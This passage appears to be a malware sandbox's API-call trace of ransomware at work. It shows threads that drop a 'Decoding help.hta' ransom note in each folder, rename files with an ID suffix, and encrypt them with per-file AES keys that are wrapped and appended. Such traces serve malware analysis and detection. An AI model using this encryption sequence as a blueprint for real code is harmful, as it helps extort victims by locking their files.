nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x261dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x261dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.316] CloseHandle (hObject=0xad0) returned 1 [0058.316] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.317] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.317] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.317] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*" [0058.317] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\*.*") returned 63 [0058.317] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg" [0058.317] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg" [0058.317] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.317] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\uk_ua\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xad0 [0058.317] CreateFileMappingA (hFile=0xad0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xad4 [0058.318] CryptAcquireContextA (in: phProv=0x261dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x261dfcec*=0x2aac52b8) returned 1 [0060.198] CryptGenKey (in: hProv=0x2aac52b8, Algid=0x6610, dwFlags=0x1, phKey=0x261dfce8 | out: phKey=0x261dfce8*=0x5d7f10) returned 1 [0060.198] CryptExportKey (in: hKey=0x5d7f10, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x261dfbe4, pdwDataLen=0x261dfce4 | out: pbData=0x261dfbe4*, pdwDataLen=0x261dfce4*=0x2c) returned 1 [0060.198] MapViewOfFile (hFileMappingObject=0xad4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x4990000 [0061.870] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x261dfbe4*, pdwDataLen=0x261dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x261dfbe4*, pdwDataLen=0x261dfcf8*=0x100) returned 1 [0061.872] CryptEncrypt (in: hKey=0x5d7f10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4990000*, pdwDataLen=0x261dfce4*=0x140, dwBufLen=0x140 | out: pbData=0x4990000*, pdwDataLen=0x261dfce4*=0x140) returned 1 [0061.875] UnmapViewOfFile (lpBaseAddress=0x4990000) returned 1 [0061.877] CloseHandle (hObject=0xad4) returned 1 [0061.877] CryptDestroyKey (hKey=0x5d7f10) returned 1 [0061.877] CryptReleaseContext (hProv=0x2aac52b8, dwFlags=0x0) returned 1 [0061.877] SetFilePointerEx (in: hFile=0xad0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.877] WriteFile (in: hFile=0xad0, lpBuffer=0x261dfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x261dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x261dfbe4*, lpNumberOfBytesWritten=0x261dfcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.878] WriteFile (in: hFile=0xad0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x261dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x261dfcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.878] CloseHandle (hObject=0xad0) returned 1 [0061.878] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\uk_UA\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.878] FindNextFileW (in: hFindFile=0x5da978, lpFindFileData=0x261dfd30 | out: lpFindFileData=0x261dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 0 [0061.878] FindClose (in: hFindFile=0x5da978 | out: hFindFile=0x5da978) returned 1 Thread: id = 826 os_tid = 0xb68 [0054.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*", lpFindFileData=0x2631fd30 | out: lpFindFileData=0x2631fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da7b8 [0056.839] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.839] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x2631fd30 | out: lpFindFileData=0x2631fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.839] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.839] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.839] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x2631fd30 | out: lpFindFileData=0x2631fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.839] lstrcpyW (in: lpString1=0x1151f328, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*" [0056.839] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*") returned 63 [0056.839] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Decoding help.hta" [0056.839] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\decoding help.hta")) returned 0xffffffff [0056.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac4 [0058.312] WriteFile (in: hFile=0xac4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2631fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2631fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.313] CloseHandle (hObject=0xac4) returned 1 [0058.313] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.314] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.314] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.314] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*" [0058.314] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\*.*") returned 63 [0058.314] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg" [0058.314] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg" [0058.314] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.315] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_cn\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac4 [0058.315] CreateFileMappingA (hFile=0xac4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xac8 [0058.315] CryptAcquireContextA (in: phProv=0x2631fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2631fcec*=0x2aac5230) returned 1 [0060.197] CryptGenKey (in: hProv=0x2aac5230, Algid=0x6610, dwFlags=0x1, phKey=0x2631fce8 | out: phKey=0x2631fce8*=0x5d8410) returned 1 [0060.197] CryptExportKey (in: hKey=0x5d8410, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2631fbe4, pdwDataLen=0x2631fce4 | out: pbData=0x2631fbe4*, pdwDataLen=0x2631fce4*=0x2c) returned 1 [0060.197] MapViewOfFile (hFileMappingObject=0xac8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x4990000 [0061.194] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2631fbe4*, pdwDataLen=0x2631fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2631fbe4*, pdwDataLen=0x2631fcf8*=0x100) returned 1 [0061.197] CryptEncrypt (in: hKey=0x5d8410, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4990000*, pdwDataLen=0x2631fce4*=0x140, dwBufLen=0x140 | out: pbData=0x4990000*, pdwDataLen=0x2631fce4*=0x140) returned 1 [0061.199] UnmapViewOfFile (lpBaseAddress=0x4990000) returned 1 [0061.201] CloseHandle (hObject=0xac8) returned 1 [0061.201] CryptDestroyKey (hKey=0x5d8410) returned 1 [0061.201] CryptReleaseContext (hProv=0x2aac5230, dwFlags=0x0) returned 1 [0061.201] SetFilePointerEx (in: hFile=0xac4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.202] WriteFile (in: hFile=0xac4, lpBuffer=0x2631fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2631fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2631fbe4*, lpNumberOfBytesWritten=0x2631fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.202] WriteFile (in: hFile=0xac4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2631fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2631fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.203] CloseHandle (hObject=0xac4) returned 1 [0061.203] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_CN\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.203] FindNextFileW (in: hFindFile=0x5da7b8, lpFindFileData=0x2631fd30 | out: lpFindFileData=0x2631fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 0 [0061.203] FindClose (in: hFindFile=0x5da7b8 | out: hFindFile=0x5da7b8) returned 1 Thread: id = 827 os_tid = 0xb7c [0054.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x2645fd30 | out: lpFindFileData=0x2645fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa938e870, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6718b0 [0054.553] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.554] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0x2645fd30 | out: lpFindFileData=0x2645fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa938e870, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.554] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.554] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.554] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0x2645fd30 | out: lpFindFileData=0x2645fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdae7f300, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xdae7f300, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xdae7f300, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x59bde5, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0054.554] lstrcpyW (in: lpString1=0x116f9b48, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" [0054.554] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 126 [0054.554] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" [0054.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\decoding help.hta")) returned 0xffffffff [0054.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83c [0056.579] WriteFile (in: hFile=0x83c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2645fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2645fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.728] CloseHandle (hObject=0x83c) returned 1 [0058.729] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.729] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0058.729] lstrlenW (lpString="cab1.cab") returned 8 [0058.729] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" [0058.729] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 126 [0058.729] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0058.729] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0058.729] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.729] FindNextFileW (in: hFindFile=0x6718b0, lpFindFileData=0x2645fd30 | out: lpFindFileData=0x2645fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36fed00, ftCreationTime.dwHighDateTime=0x1d28825, ftLastAccessTime.dwLowDateTime=0x36fed00, ftLastAccessTime.dwHighDateTime=0x1d28825, ftLastWriteTime.dwLowDateTime=0x36fed00, ftLastWriteTime.dwHighDateTime=0x1d28825, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x0, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0058.729] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" [0058.729] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package 